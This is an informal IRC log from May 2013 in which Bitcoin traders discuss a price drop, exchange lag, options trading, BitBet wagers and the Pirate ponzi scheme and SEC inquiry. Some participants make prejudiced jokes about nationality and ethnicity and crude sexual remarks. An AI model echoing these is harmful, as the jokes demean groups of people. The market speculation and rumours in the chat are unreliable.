20:48:04 I just picked up a bunch. May 01 20:48:24 me too May 01 20:48:32 a lil worried its not done though May 01 20:49:02 sold yesterday May 01 20:49:37 first time ever i see something in all those chart May 01 21:01:49 [BTCTC] [ASICMINER-PT] 8 @ 1.25 = 10 BTC [+] May 01 21:01:54 [BTCTC] [ASICMINER-PT] 1 @ 1.264 BTC [+] May 01 21:01:59 [BTCTC] [ASICMINER-PT] 3 @ 1.264999 = 3.795 BTC [+] May 01 21:02:09 [BTCTC] [ASICMINER-PT] 3 @ 1.265 = 3.795 BTC [+] May 01 21:07:32 hrm May 01 21:07:36 was there any discussion on http://bitbet.us/bet/337/bfl-will-deliver-asic-devices-before-may-1st/ May 01 21:07:41 since the outcome is no May 01 21:11:47 blah May 01 21:11:50 did i miss any resposnes? :-/ May 01 21:12:05 [HAVELOCK] [SDICE] 3 @ 0.32999999 = 0.99 BTC [+] May 01 21:12:24 no May 01 21:12:34 theres no discussion either May 01 21:12:41 http://trilema.com/2013/internet-story/ May 01 21:12:43 for total lulz. May 01 21:12:53 bet results are privately decided by mods May 01 21:13:01 JUST TWO MOAR WEEKS!!!!!! May 01 21:13:09 not likely theyll be justifying themselves in forums May 01 21:14:29 inhies_ there's a forum thread May 01 21:14:45 https://bitcointalk.org/index.php?topic=192122.msg1995961#msg1995961 May 01 21:15:57 nice links May 01 21:16:16 will camgirl be starting a fund May 01 21:17:16 mircea_popescu: thanks May 01 21:18:54 i'm taking the action in the money mayweather match May 01 21:19:14 lol May 01 21:19:21 ThickAsThieves in romanian fund is how you say butt. May 01 21:19:35 lol May 01 21:19:37 nice blog post May 01 21:20:29 i hope it will collect good qty of butthurt and drama to prop btc with May 01 21:25:04 i've got people taking odds on mayweather in skype May 01 21:25:14 http://bitbet.us/bet/396/floyd-mayweather-will-win-his-boxing-match-against/ May 01 21:25:25 step up and get your money taken May 01 21:26:20 jcpham use your referal dawg May 01 21:26:28 what's that May 01 21:26:51 nah i don't like doing that May 01 21:27:02 ;;ticker May 01 21:27:03 BTCUSD ticker | Best bid: 119.98095, Best ask: 120.00000, Bid-ask spread: 0.01905, Last trade: 120.00000, 24 hour volume: 106062.78660435, 24 hour low: 120.10000, 24 hour high: 141.90000, 24 hour vwap: 130.56934 May 01 21:27:13 !bids 0 May 01 21:27:16 ;;bids 0 May 01 21:27:17 There are currently 1.8694388e+08 bitcoins demanded at or over 0.0 USD, worth 16736350.5685 USD in total. | Data vintage: 21.9164 seconds May 01 21:27:37 $23M last week :/ May 01 21:27:38 ;;bids 1 May 01 21:27:38 There are currently 589534.58 bitcoins demanded at or over 1.0 USD, worth 16621516.048 USD in total. | Data vintage: 43.1612 seconds May 01 21:28:56 this is gonna get ugly May 01 21:29:25 ;;tricker May 01 21:29:26 Error: "tricker" is not a valid command. May 01 21:29:33 lies May 01 21:29:37 ;;goxlag May 01 21:29:38 MtGox lag is 57.429796 seconds. During this time, light travels 0.115088668168 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). May 01 21:29:40 here we go May 01 21:30:03 ;;eightball 99 today ? May 01 21:30:03 I doubt it very much. May 01 21:30:04 oh boy... time for some excitement! May 01 21:32:29 le wow. May 01 21:32:33 motherfucker! I just locked myself outta gox May 01 21:32:36 caps lock on May 01 21:32:58 epic fail :D May 01 21:33:07 get a password manager May 01 21:33:28 its lock after 1 wrong try ? May 01 21:33:34 3 maybe? May 01 21:33:47 ;;ticker --last May 01 21:33:48 114.77854 May 01 21:34:37 i have mas bids up under 100 too May 01 21:34:46 hopefully it doesnt crash too far... May 01 21:34:55 *Framedragger* PRIVMSG mircea_popescu :hey Mircea, i'd like to buy 1000 credits for Trilema for $1 in BTC, while 1BTC is still > $100 :) May 01 21:35:03 any idea why it's going down like that? May 01 21:35:07 mass selloffs? May 01 21:35:09 I would be a buyer under 100 May 01 21:35:17 I want to pick up 2100 at the bottom May 01 21:35:26 100 will be tough to get thru May 01 21:35:29 obviously May 01 21:35:36 holy crap May 01 21:36:06 +100% supply -25% order, do the math May 01 21:36:08 ;;ticker May 01 21:36:08 BTCUSD ticker | Best bid: 112.30000, Best ask: 114.00000, Bid-ask spread: 1.70000, Last trade: 114.00000, 24 hour volume: 114867.53833811, 24 hour low: 113.28767, 24 hour high: 141.90000, 24 hour vwap: 129.33034 May 01 21:36:14 lalala May 01 21:36:22 Bugpowder 2100 at 100? May 01 21:36:37 damn you laws of supply and demand May 01 21:37:05 ;;goxlag May 01 21:37:15 Error: Problem retrieving gox lag. Try again later. May 01 21:37:16 108 May 01 21:38:00 theres your lag http://bit.ly/ZA8krl May 01 21:38:04 ThickAsThieves: your theory was right May 01 21:38:04 back to 50 May 01 21:38:08 it was fixed May 01 21:38:16 its sub 1h May 01 21:38:19 damn it, always happens just after I transfer my fiat back to my bank account May 01 21:38:27 lol May 01 21:38:30 is this like 12 day low? May 01 21:38:32 ;;next May 01 21:38:32 target: 135 | updated by OneFixt at May 1 2013, 18:07 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 31 minutes and 28 seconds ago May 01 21:38:49 too bad i didnt listen to my own theory May 01 21:39:26 what did i say, if 108 didnt happen before thursday it wasnt gonna happen May 01 21:39:30 welp it happened May 01 21:39:34 It'll whiplash hard though May 01 21:39:41 that's the next part of your theory May 01 21:39:50 104 May 01 21:39:51 whatever it bounces off of it's gonna bounce...hard May 01 21:40:05 cause people like Bugpowder will start buying May 01 21:40:31 SEE May 01 21:40:33 I just saw it May 01 21:40:42 2704 @ 105 May 01 21:40:42 was that 2202 bugpowder? May 01 21:40:48 I actually placed a bid at 110 May 01 21:40:55 but cancelled it before execution May 01 21:41:08 oh God this is gonna get messy May 01 21:42:06 Replaced the bid May 01 21:42:22 at? May 01 21:42:27 110 May 01 21:42:33 I should not have cancelled May 01 21:42:45 you should have gotten at 105 May 01 21:42:49 nice May 01 21:42:52 you were right in your rationale May 01 21:42:57 fucking missed it May 01 21:43:00 FUCK May 01 21:43:06 because you're using THE FUCKING WEBSITE May 01 21:43:25 trying to out click bots? May 01 21:43:40 Didn't we all learn our lesson via Diablo 2? May 01 21:44:33 ;;ticker May 01 21:44:34 BTCUSD ticker | Best bid: 110.00001, Best ask: 115.78702, Bid-ask spread: 5.78701, Last trade: 116.99900, 24 hour volume: 130746.14941506, 24 hour low: 104.00000, 24 hour high: 141.90000, 24 hour vwap: 126.33049 May 01 21:45:03 ;;ticker May 01 21:45:10 this is a wicked spread... May 01 21:45:14 Error: Failure to retrieve ticker. Try again later. May 01 21:45:22 the days of monster spreads are but it seems... May 01 21:45:51 lag at 120 May 01 21:46:21 change that to 150 May 01 21:46:23 if i were using a chromebook, i'd be playing on gox right now May 01 21:46:27 no caps lock key May 01 21:47:09 oh man that spread is closing like a mofo May 01 21:47:46 o wonder what btc.sx says May 01 21:48:12 hm 4$ only May 01 21:48:16 lol May 01 21:48:39 damn i only have some pocket change in there May 01 21:48:45 a few dessert spoons if you will May 01 21:50:18 that's some wicked whiplash May 01 21:50:35 ;;ticker May 01 21:50:36 BTCUSD ticker | Best bid: 112.50000, Best ask: 113.53478, Bid-ask spread: 1.03478, Last trade: 113.53478, 24 hour volume: 132756.85538487, 24 hour low: 104.00000, 24 hour high: 141.90000, 24 hour vwap: 125.65024 May 01 21:50:43 first pullback in lag May 01 21:50:58 ;;bc,24hprc May 01 21:50:59 126.54 May 01 21:51:04 ;;goxlag May 01 21:51:14 Error: Problem retrieving gox lag. Try again later. May 01 21:51:18 ahahahahaha May 01 21:51:24 [BTCTC] [PAJKA.BOND] 30 @ 0.1 = 3 BTC [-] May 01 21:51:28 what's the mpex python client called? May 01 21:51:29 ;;bids 0 May 01 21:51:29 There are currently 26774400 bitcoins demanded at or over 0.0 USD, worth 14729685.3373 USD in total. | Data vintage: 60.9113 seconds May 01 21:51:31 nvm May 01 21:52:27 btw May 01 21:52:32 this was my prediction May 01 21:52:33 http://i.imgur.com/8yshAXK.jpg May 01 21:52:41 create 4/27 May 01 21:52:47 what is m2? May 01 21:52:48 created May 01 21:53:09 ThickAsThieves what is m2? May 01 21:53:17 magic number 2 May 01 21:53:33 ThickAsThieves: where are we now? May 01 21:53:49 H2 May 01 21:53:57 we're in the H2 valley May 01 21:54:14 https://bitcointalk.org/index.php?topic=140654 May 01 21:54:25 so this guy is actually trying to dig himself out of the hoel ? May 01 21:55:12 benkay, M@ corresponded to M1 May 01 21:55:19 M2* not M@ May 01 21:55:21 mircea_popescu: what did he do? May 01 21:55:27 you know the pirate bet May 01 21:55:35 the chart shows how we're in a compressed recreation of the most recent bubble May 01 21:55:37 that he would pay? May 01 21:55:43 [BTCTC] [ASICMINER-PT] 1 @ 1.274 BTC [+] May 01 21:55:47 I think this is before my time May 01 21:55:52 !ticker H HIM May 01 21:55:53 [HAVELOCK:HIM] 1D: 1.79000000 / 1.84053889 / 1.85010000 (18 shares, 33.12970000 BTC), 7D: 1.46040000 / 1.84566645 / 1.96000000 (158 shares, 291.61529974 BTC), 30D: 0.75000001 / 1.6547747 / 2.05990000 (737 shares, 1219.56895360 BTC) May 01 21:56:04 meta oscillation or such May 01 21:56:04 ThickAsTHieves I totally didn't read the labels on the graph. hungover. May 01 21:56:09 [BTCTC] [ASICMINER-PT] 2 @ 1.2749 = 2.5498 BTC [+] May 01 21:56:58 pirate is the guy who pulled the ponzi scheme right? May 01 21:57:04 also before my time May 01 21:57:23 yeah. May 01 21:57:34 this guy made an open offer bet to anyyone on the forum that pirate pays out May 01 21:57:46 he ended up with 10's of k's of btc bet (at the time price was under 10) May 01 21:57:56 so he just made a post saying "i give x 48957349859 btc" etc. May 01 21:58:07 supposedly it was a joke, ppl were pretty pissed. May 01 21:58:23 ooh a meta-scam May 01 21:58:26 lovely May 01 21:58:28 sorta kinda May 01 21:59:05 remind me again why I bother pursuing legal remuneration for things? May 01 21:59:11 people are so dumb. May 01 21:59:33 i dont understand - how were people financial hurt? May 01 21:59:46 probably hedging it as insurance? May 01 22:00:00 ah May 01 22:00:01 pgp2 well supposedly some used it as a hedge on pirate. May 01 22:00:14 but genberally at the time situation was very tense. May 01 22:00:44 incidentally rthe original "mpoe-pr is bad pr" and/or "mp is evil" started because the girl called the entire thing a scam last april May 01 22:00:46 or was it march May 01 22:00:56 Bitcoin history is better than any movie May 01 22:01:02 this at the time was serious cognitive dissonance, as pretty much everyone was on the bandwagon May 01 22:01:24 so people were truely furious when the thing did in fact keel May 01 22:01:41 i see May 01 22:01:43 as in "i can't believe i've been this stupid and it totally can't be my fault" May 01 22:02:09 [MPEX] [S.DICE] 4950 @ 0.00307414 = 15.217 BTC [-] May 01 22:02:11 [MPEX] [S.DICE] 5000 @ 0.003 = 15 BTC [-] May 01 22:02:12 [MPEX] [S.DICE] 1000 @ 0.00290011 = 2.9001 BTC [-] May 01 22:02:18 [MPEX] [S.DICE] 1000 @ 0.00290001 = 2.9 BTC [-] May 01 22:02:21 how many BTC did pirate make off with? May 01 22:02:25 no SDICE, up you must go! May 01 22:02:42 pgp2 at most half a mil May 01 22:02:54 tho that's really the upper bound of outstanding obligations May 01 22:02:54 have those been spent yet? May 01 22:03:03 he probably sold most of his loot at around 7 usd per May 01 22:03:12 and that means about 100k or so i'd guess (dollars) May 01 22:03:26 "probably"? can't we verify this? May 01 22:03:30 nope. May 01 22:04:06 put it through a mixer, i presume.. May 01 22:04:21 we can verify that it hit a mixer. May 01 22:04:23 i can give you an address May 01 22:04:24 he had the original miner haspower exchange thing May 01 22:04:25 MP, how long have you been into BTC now? Since 2011 or earlier? May 01 22:04:30 if you want to see what mixing loooks like May 01 22:04:31 pretty much for the purpose of buying newly minted coins May 01 22:04:36 under the pirate ship May 01 22:04:36 because in btc you can't really run a ponzi May 01 22:04:46 as if you pay investors with investor money this is obvious in the bliockchain May 01 22:04:54 yes, yes it is May 01 22:04:55 damientrog july 2011 May 01 22:05:16 hmmm May 01 22:05:40 nice, that's quick to establish the exchange May 01 22:06:13 https://bitcointalk.org/index.php?topic=50822.msg854918#msg854918 May 01 22:06:21 that's, if you're curious, how the entire kraken meme got started. May 01 22:06:47 [BTCTC] [ASICMINER-PT] 1 @ 1.275 BTC [+] May 01 22:08:03 1AsKbn1xD5QieiS6dpaC6kKmg3EjW22qup May 01 22:08:58 http://blockchain.info/tx/20899fd84a52b3d8862c50c9e145e8b443157bf9f770be04de6fed214337784a May 01 22:09:03 has ponzi written all over it May 01 22:09:36 does anyone have a moment to debug jurov's mpex client with me? May 01 22:09:50 or, more likely, debug my setup for running it? May 01 22:10:40 what language is it written in? May 01 22:10:52 jcpham also from belgium, so child porn May 01 22:11:28 you prejudiced gypsy May 01 22:11:30 :) May 01 22:12:27 jesus fuck these people. May 01 22:12:39 "yes we advertise. no we only do banners. here's our media kit" May 01 22:12:42 python, damientrog May 01 22:12:49 "media kit" is this $40 CPM bullshit. May 01 22:13:16 hmm that's been many years ago for me May 01 22:13:19 as if i am EVER paying 4 cents per page refresh, what am i, bernanke ? May 01 22:13:44 by debugging, you mean bug fixing? May 01 22:14:05 just use google adwords May 01 22:14:06 ;;goxlag May 01 22:14:16 always willing to take a look May 01 22:14:17 Error: Problem retrieving gox lag. Try again later. May 01 22:17:43 just came in. looks like python3-related problem (isn't supported yet) May 01 22:20:55 [BTCTC] [ASICMINER-PT] 1 @ 1.275 BTC [+] May 01 22:27:01 ;;ticker May 01 22:27:02 BTCUSD ticker | Best bid: 114.01000, Best ask: 116.00000, Bid-ask spread: 1.99000, Last trade: 114.01000, 24 hour volume: 145094.43438432, 24 hour low: 104.00000, 24 hour high: 141.90000, 24 hour vwap: 124.34100 May 01 22:27:33 $avg May 01 22:27:34 ThickAsThieves: 124.39 May 01 22:28:05 [HAVELOCK] [SDICE] 1 @ 0.33 BTC [+] May 01 22:29:14 damientrog it was a python 3 thing May 01 22:29:21 http://www.wwe.com/f/wysiwyg/image/2012/04/Bryan%20YES%20Article%20IMAGE.jpg bitcoin crashing May 01 22:29:34 idiots are all "USE ALL THE PYTHON 3 PACKAGES BY DEFAULT ALL THE TIME WHO CARES ABOUT YOUR NOT EVEN OLD DEPENDENCIES" May 01 22:29:35 excuse me. May 01 22:30:08 ThickAsThieves, will you also offer options on TAT.ASICMINER in any significant quantity? May 01 22:30:45 well that always sucks when it's such a low level problem May 01 22:30:45 there's very serious interest in them. or in shorting. May 01 22:31:21 anyone that owns shares/btc can write options May 01 22:31:33 one can write options on the assets on the exchange? May 01 22:31:34 whoa. May 01 22:31:46 benkay, both bf and btct has this May 01 22:31:53 I do have intentions of starting an options-oriented fund after these assets are off the ground May 01 22:32:09 but usually no one is market making yet May 01 22:32:21 which will likely involve playing on all exchanges that offer options features May 01 22:32:30 including writing and buying May 01 22:32:47 so maybe that can be your market maker May 01 22:33:26 of course itd be tricky to get involved in too many assets May 01 22:33:39 so might just be USD/BTC to start May 01 22:33:45 no just do asicminer and do it right May 01 22:34:06 he prolly has a point. May 01 22:34:09 focus is valuable May 01 22:34:24 usd/btc is quite risky, as we all know :) May 01 22:34:32 indeed May 01 22:35:24 maybe if i end up with piles of AM shares i'll consider it May 01 22:35:38 one thing at a time for now tho May 01 22:36:42 would someone remind me of the calculation of the breakeven point for puts and calls? May 01 22:37:29 benkay https://www.bitcoinforum.com/coinbr-com/call-option-calculation/msg2445/#msg2445 May 01 22:37:39 ;;slap deadweasel May 01 22:37:42 thanks jurov May 01 22:37:58 benkay May 01 22:38:00 also, https://bitcointalk.org/index.php?topic=157232.0 May 01 22:38:24 ^that weasely dude was hired to write a manual... a month ago or so May 01 22:38:30 note that google updates are unpredictable May 01 22:38:35 so you need to make a copy of the doc May 01 22:38:40 to instigate an update May 01 22:38:41 i think we can consider this position vacant May 01 22:39:06 [BTCTC] [ASICMINER-PT] 7 @ 1.275 = 8.925 BTC [+] May 01 22:39:24 lol braw clip May 01 22:41:06 Wow, those options are pricing in massive moves. Are you able to sell them like normal options or just buy them? May 01 22:41:11 and by sell I mean write. May 01 22:41:12 jurov, i'll send you what i have May 01 22:41:22 but I just don't care enought to finish May 01 22:41:55 how so? May 01 22:43:15 bitcoiners are so incredibly lazy :/ May 01 22:43:46 what's the status of the thing? May 01 22:44:11 i have full time job, plus full time lady friend, plus full time martial arts training and instructing... i can barely keep up with bitcoin as is May 01 22:45:26 come get May 01 22:45:33 don't believe him... sprained his wrist from fapping actually May 01 22:45:36 :D May 01 22:45:46 ^ martial art fapping is intense! May 01 22:45:54 is there a word for the spread between options breakeven? May 01 22:46:21 benkay, I call that the great divide May 01 22:46:33 but it's colloquial to me May 01 22:47:05 what's that jurov? May 01 22:47:13 i borked my MSGS May 01 22:47:15 deadweasel thanks anyway May 01 22:47:19 http://trilema.com/2013/bitbet-april-2013-statement/ May 01 22:47:20 just that May 01 22:47:44 no worries, take it from there... i was gonna make it pretty, but meh. May 01 22:47:54 tk993 yes you can both write and buy May 01 22:48:04 premature optimization, eh? May 01 22:48:51 no doubt May 01 22:48:56 went everywhere May 01 22:49:25 was gonna do examples and everything May 01 22:50:05 $avg May 01 22:50:06 benkay: 124.01 May 01 22:51:13 is this a possible vector of attack on mpex? = they'd buy 4000 puts then ddos and dump their btc for 24 hrs then exercise.... May 01 22:51:18 mircea_popescu: the x axis are days in april? May 01 22:51:24 in bbet graph May 01 22:51:28 deadweasel if you sell the puts you can't exercise them May 01 22:51:34 jurov should be yea May 01 22:51:51 deadweasel o nm. yes, in theory this is possible. May 01 22:52:07 but they would have to have huge resources and motivation May 01 22:52:35 no, it's not unlikely something like that happened already May 01 22:52:47 but it's hard to pick up from all the noise May 01 22:52:54 well i saw those 4k puts bought and started wondering May 01 22:52:59 they were sold. May 01 22:53:15 that position is currently well underwater. May 01 22:54:02 awesome May 01 22:54:39 taub terryww thestringpuller ThickAsThieves thoa_afk tk993 TomServo topace topace_ Transisto Tritonio_ troc Troic_ truffles Tykling May 01 22:54:46 long way till the end of the month, but bondholders are happy in one way - May 01 22:54:49 i guess that practically answers tk993 's question. yes, someone wrote 4k puts yest May 01 22:55:03 10k bitcoins to the winner May 01 22:55:16 well wait, no 5000 May 01 22:55:42 nah it's not that bad. -0.2 per or w/e May 01 22:55:52 and if the same person also sold the 4k calls, then .1 from there May 01 22:56:29 oh , yeah I forgot about the settlement value May 01 22:56:39 and the calls ofsetting May 01 22:56:42 off May 01 22:57:13 so a 40 dollar dip May 01 22:57:18 seems nomral to me May 01 22:57:22 ;;ticker May 01 22:57:23 BTCUSD ticker | Best bid: 108.30000, Best ask: 109.00000, Bid-ask spread: 0.70000, Last trade: 109.00000, 24 hour volume: 153906.50061501, 24 hour low: 104.00000, 24 hour high: 141.90000, 24 hour vwap: 123.43449 May 01 22:57:32 ;;ticker --high May 01 22:57:33 141.90000 May 01 22:57:36 ;;ticker --low May 01 22:57:37 104.00000 May 01 22:58:02 ;;calc 104/141.9 May 01 22:58:03 0.732910500352 May 01 22:58:05 so legit May 01 22:58:13 what are you calculating there? May 01 22:58:24 how many times 141 goes into 104 May 01 22:58:29 derpface May 01 22:58:33 what's the intel you glean from that? May 01 22:58:48 i think it is a fraction May 01 22:59:05 how do imath percents from fractions? May 01 22:59:07 [MPEX] [S.DICE] 4200 @ 0.00311776 = 13.0946 BTC [+] May 01 22:59:44 loss factor, then? May 01 22:59:52 maybe May 01 22:59:56 or inverse or something May 01 23:00:04 looks like 73% loss May 01 23:00:09 but that can't be right May 01 23:00:20 27% spread noob May 01 23:00:25 those maths are no good May 01 23:00:27 lmao May 01 23:00:33 i am so wat **** BEGIN LOGGING AT Thu May 2 07:03:45 2013 May 02 07:03:47 ? May 02 07:03:56 ohai mircea_popescu May 02 07:04:13 grubles May 02 07:04:18 wat May 02 07:04:27 wat wat? May 02 07:04:28 heya May 02 07:07:07 joecool, ? May 02 07:07:59 Hi. May 02 07:08:45 grubles: ? May 02 07:08:55 you wat'd me May 02 07:09:50 grubles: wat May 02 07:10:07 stahp! May 02 07:10:14 and buy my mpex acct May 02 07:10:24 how much you want to sell it for May 02 07:10:38 pm May 02 07:22:21 so this is the new high May 02 07:22:22 heh May 02 07:22:47 ;;ticker May 02 07:22:48 BTCUSD ticker | Best bid: 116.00011, Best ask: 116.48899, Bid-ask spread: 0.48888, Last trade: 116.48900, 24 hour volume: 175921.25091255, 24 hour low: 104.00000, 24 hour high: 137.46000, 24 hour vwap: 118.66396 May 02 07:23:44 im happy with 116 May 02 07:23:49 honestly think its too high May 02 07:24:07 i just hope we dont ever go under 50 again May 02 07:26:33 seems unlikely. May 02 07:26:42 yeah May 02 07:27:03 but im pretty sure we will see double digits again May 02 07:27:46 this bubble bull seems over, maybe not but seems we got to wait a while for the next huge run up May 02 07:33:31 lol well which is it goat May 02 07:34:05 i think we will slowly trend down for a while until we find stable May 02 07:34:12 have no idea what that is, and i might not be right May 02 07:34:16 im not god you know:) May 02 07:34:41 i just hope that finnish guy send me that 100k usd for the 134$ price muhahahah May 02 07:35:41 Chaang-Noi i bet you he won't. May 02 07:35:45 at which point scammer tag ? May 02 07:35:54 that was the point of this May 02 07:36:10 he has 2 weeks May 02 07:36:16 from monday May 02 07:36:44 scammer tags are tossed around on the forums like they mean something May 02 07:36:50 narcs narcing narcs May 02 07:37:11 ill still have a thread. the point was to have him prove he is a "player" May 02 07:37:23 i honestly thought he would turn me down but he said he will do it May 02 07:37:39 he is either a troll or just fucking crazy, or high May 02 07:37:42 i watched 2 people report each other to admins over bullshit in a thread today like it meant something May 02 07:37:47 he deleted my posts May 02 07:37:48 if he is a troll we will find out soon enough May 02 07:38:13 i wont report to an admin, ill just make a thread May 02 07:38:30 i'll make a thread too May 02 07:38:34 i just want to prove that he is a troll, or i get 100kusd May 02 07:38:35 it will be my first one May 02 07:38:38 its win win for me May 02 07:38:52 [BTCTC] [COGNITIVE] 1 @ 0.23001 BTC [-] May 02 07:39:01 go cognitive:) May 02 07:39:02 just wondering but how are people trading with you still goat May 02 07:39:14 what do you mean how? May 02 07:39:21 dont you know how bankls and btc works? May 02 07:39:28 after all the pirate and tygrr stuff and whatnot May 02 07:39:42 [BTCTC] [COGNITIVE] 12 @ 0.23 = 2.76 BTC [-] May 02 07:39:43 lol im not pirate, and paid in fuill all my insured shit May 02 07:39:51 ;;gpg info Chaang-Noi May 02 07:39:51 No such user registered. May 02 07:39:53 i was a ppt May 02 07:39:56 see grubles May 02 07:40:00 it's that easy May 02 07:40:05 narcs narcing narcs <<< this May 02 07:40:23 you never gave pirate the id info for your ppt peeps right? May 02 07:40:24 that's how i feel about the forum in 3 words May 02 07:40:44 no one has made a scammers thread aginst me but some nefario perv who did it cuz i said nefario was a scammer, but after a week he apoligized and took it down May 02 07:41:02 that's what i mean forum scammer tags don't mean shit May 02 07:41:08 if you had on otc key May 02 07:41:09 grubles one i never had it, and even if i did, i would need the concent of the people before i passed that info on May 02 07:41:12 the forum in general doesnt mean shit May 02 07:41:14 we'd have fucked it all up by now May 02 07:41:26 grubles pumping pirate was something everyone except me did. May 02 07:41:30 anyway that finish guy claims to have sent me 100k usd with no escrow May 02 07:41:32 you're late tagging giga, too, for that matter. May 02 07:41:42 and whoever else, take your pick. May 02 07:41:58 pumping in what way exactly? May 02 07:41:59 [BTCTC] [ASICMINER-PT] 1 @ 1.2896 BTC [-] May 02 07:42:00 vouching for him? May 02 07:42:07 pumping is pumping. May 02 07:42:08 well people were saying i was helping pirate but i was really helping theymos, he asked for me to do it, to help his glbse stock price May 02 07:42:11 cee pee in the blockchain news dropped yet? May 02 07:42:15 like penis pumping or what?? May 02 07:42:18 what, running his ppt is bad and that's it ? May 02 07:42:23 [MPEX] [S.MPOE] 8188 @ 0.00068748 = 5.6291 BTC [+] May 02 07:42:37 i was there in the btcst thread with Chaang-Noi May 02 07:42:40 dujb May 02 07:42:41 yes dub its just links right? who cares :/ May 02 07:42:43 dub not yet May 02 07:42:46 theymos asked for an invite and no one referred him May 02 07:42:50 [BTCTC] [COGNITIVE] 1 @ 0.23001 BTC [+] May 02 07:42:52 so goat made a ppt May 02 07:42:54 [BTCTC] [COGNITIVE] 16 @ 0.23 = 3.68 BTC [-] May 02 07:42:59 Chaang-Noi: fox is gonna care May 02 07:43:10 ya well they're not smart enough yet. May 02 07:43:16 jcpham i refured theymos, pirate just did not accept fast enough May 02 07:43:16 [BTCTC] [ASICMINER-PT] 6 @ 1.29 = 7.74 BTC [+] May 02 07:43:18 so should've referred theymos May 02 07:43:24 that's funny May 02 07:43:26 dub fox, muyhahahaha lol May 02 07:43:35 he didn't trust theymos then May 02 07:43:44 referred theymos for what? May 02 07:43:45 because he responded pretty fast May 02 07:43:48 a btcst acct? May 02 07:43:50 to me May 02 07:43:53 jcpham theymos asked me to refur him, i did, then theymos did not want to wait and asked for the ppt so i did May 02 07:44:02 ijs May 02 07:44:06 ;;ud refur May 02 07:44:07 http://www.urbandictionary.com/define.php?term=refur | simply to "fuck" normally used to refur to the anal region. May 02 07:44:09 yeah theymos asked me to get him a btcst account May 02 07:44:15 lol May 02 07:44:21 it is so funny May 02 07:44:22 was expecting greatness May 02 07:44:25 in retrospect May 02 07:44:31 jcpham mostly to me but yeah. May 02 07:44:46 theymos wanted to pump his glbse stock and get dividends May 02 07:44:49 i was like fine May 02 07:44:52 [BTCTC] [BASIC-MINING] 1 @ 0.40002 BTC [+] May 02 07:44:56 [BTCTC] [BASIC-MINING] 1 @ 0.400001 BTC [-] May 02 07:44:58 no one is legit. May 02 07:44:59 [BTCTC] [BASIC-MINING] 1 @ 0.400001 BTC [-] May 02 07:45:00 no one. May 02 07:45:04 [BTCTC] [BASIC-MINING] 2 @ 0.400001 = 0.8 BTC [-] May 02 07:45:05 i still have the logs of the -onepercent doods getting all hot under their collar about it lol. May 02 07:45:09 then it went sideways and theymos did not do the right thing May 02 07:45:15 [BTCTC] [BASIC-MINING] 3 @ 0.400001 = 1.2 BTC [-] May 02 07:45:28 Chaang-Noi o, you did right ? it's just theymos' fault is all. May 02 07:45:35 except me. 129% legit May 02 07:45:38 are you still after pirate legally Chaaaaaaaaaaaaaaaaaaaaang? May 02 07:45:41 fault for pirate? no May 02 07:45:51 but theymos did not do what was right in all of this. May 02 07:45:58 i heard you had a "contract" May 02 07:46:06 grubles after the SEC come in my lawyer said to wait May 02 07:46:10 i like this guy, he has the mentality of an asian prostitute. May 02 07:46:13 i got all sorts of logs and "contracts" May 02 07:46:22 i think pirate's irc nick was a team of people now May 02 07:46:24 Chaang-Noi, wait what? May 02 07:46:32 irc was a team if you ask me May 02 07:46:36 not just a single person May 02 07:46:40 hey, is my irc a team ? May 02 07:46:45 i dunno May 02 07:46:51 don't think so based on your hours May 02 07:46:52 jcpham May 02 07:46:52 the SEC was doing an investigation May 02 07:46:59 hm. May 02 07:47:03 now they have witnesses lined up May 02 07:47:06 jcpham, what makes you think it was more than one peep? May 02 07:47:11 hours May 02 07:47:12 tehy asked me to be one but i never responded. May 02 07:47:17 weird times i'd message him May 02 07:47:22 Chaang-Noi, why not you dingus May 02 07:47:26 i may be wrong May 02 07:47:32 but especially towards the end May 02 07:47:42 weird times like when May 02 07:47:44 grubles the SEC siad the ppt might not be safe, lol May 02 07:47:48 2am? May 02 07:47:50 4 in the morning or something? May 02 07:47:52 oh May 02 07:47:58 well shit ive been up way past that May 02 07:47:59 so why go in and tell them something so they can arrest my ass? lol May 02 07:48:18 point taken grubles May 02 07:48:23 even so im not a big fan of govt regulation May 02 07:48:33 and tx is only an hour or two behind est May 02 07:48:41 mircea_popescu send -pr in here to talk shit May 02 07:48:49 i think i'll spot it she talk long enough May 02 07:48:51 Chaang-Noi, why would they arrest you May 02 07:49:03 i still think -pr is actually mircea May 02 07:49:05 nah May 02 07:49:09 they said ppt operaters might get some shit for doing that, May 02 07:49:14 some of the time it is May 02 07:49:16 tone is unmistakeable May 02 07:49:18 you can tell May 02 07:49:33 dub problem is different people can tell different bits. May 02 07:49:38 grubles they wont arrest me but they might try to take my fiat May 02 07:50:09 honestly even so im not sure i would ahve talked to the SEC, im nota big fan of govt regulation May 02 07:50:34 and also it would ahve got nefario and theymos involved and well at the time did not think that was a good idea May 02 07:50:42 looking back, fuck theymos, lol May 02 07:50:43 i thought you had 50,000 bitcoins invested with pirate May 02 07:50:51 lol no May 02 07:50:54 i remember you boasting about it May 02 07:51:02 my account had close to 50k in it May 02 07:51:04 #btcst May 02 07:51:15 but they were not all mine. May 02 07:51:31 Chaang-Noi you converted to a trust? May 02 07:51:36 but anyway even if i did the SEC thing and they did not fuck with me, think i would get anything back? May 02 07:51:48 i would have been a trust account if we got that far May 02 07:51:52 no you wouldn't get anything back. May 02 07:51:53 but he shut down fist May 02 07:52:03 yeah mp so why go work for the govt? May 02 07:52:03 i never felt comfortable with other people's money May 02 07:52:05 so I'm seeing a falling wedge which indicates an overall rising price May 02 07:52:12 looking at 30 day May 02 07:52:16 Chaang-Noi yeah. May 02 07:52:19 disclosure: i had funds of three toher people in-and-out May 02 07:52:22 at the very least you could help send pirate to prison and/or help him get the shit fined out of him May 02 07:52:24 well i told people where it was going and they knew the rules, that is why no one called me a scammer May 02 07:52:25 everyone was repaid May 02 07:52:38 it's funny how downstream the lending went May 02 07:52:50 magical interest from defaltionary coins May 02 07:53:00 heheh May 02 07:53:01 https://bitcointalk.org/index.php?topic=106391.0 May 02 07:53:05 pirate will get his once things calm down and the sec goes away, there are many many people after his ass... May 02 07:53:07 i guess it's time to link that. May 02 07:53:11 which is a reversal.. May 02 07:53:15 defaultionary coins May 02 07:53:19 tldr May 02 07:54:04 am i the only fucking person doing anything about this May 02 07:54:16 what are you doing ? May 02 07:54:16 probably May 02 07:54:17 no there are other witnesses working with the sec now May 02 07:54:24 hrm smaller AM div this week May 02 07:54:28 what would you like for me to do grubles May 